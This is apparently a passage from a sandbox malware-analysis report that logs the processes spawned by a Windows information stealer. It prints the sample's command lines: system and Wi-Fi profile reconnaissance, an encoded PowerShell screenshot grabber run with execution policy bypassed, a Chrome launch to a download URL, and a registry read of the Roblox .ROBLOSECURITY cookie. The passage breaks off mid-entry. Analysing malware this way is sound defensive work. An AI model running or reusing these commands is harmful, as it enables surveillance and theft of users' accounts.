Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6c6920000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:19:09
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:19:09
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:19:09
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:19:09
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:19:09
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:19:09
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:19:09
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	14:19:10
Start date:	31/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7f9ad0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	14:19:10
Start date:	31/10/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7821c0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	14:19:10
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:19:10
Start date:	31/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff673e00000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	14:19:11
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	14:19:11
Start date:	31/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	14:19:12
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8996, Parent PID: 8980

General

Target ID:	50
Start time:	14:19:13
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	14:19:13
Start date:	31/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7f9ad0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	14:19:14
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 9092, Parent PID: 9080

General

Target ID:	53
Start time:	14:19:14
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	14:19:14
Start date:	31/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7f9ad0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	14:19:14
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
Imagebase:	0x7ff636240000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: getmac.exePID: 8252, Parent PID: 9140

General

Target ID:	59
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff6ddb60000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	62
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	63
Start time:	14:19:15
Start date:	31/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7f9ad0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	14:19:17
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 9112, Parent PID: 9168

General

Target ID:	66
Start time:	14:19:17
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	14:19:18
Start date:	31/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7f9ad0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	14:19:19
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8016, Parent PID: 8012

General

Target ID:	69
Start time:	14:19:19
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	14:19:19
Start date:	31/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7f9ad0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	14:19:19
Start date:	31/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
Imagebase:	0x7ff7b0930000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	14:19:22
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
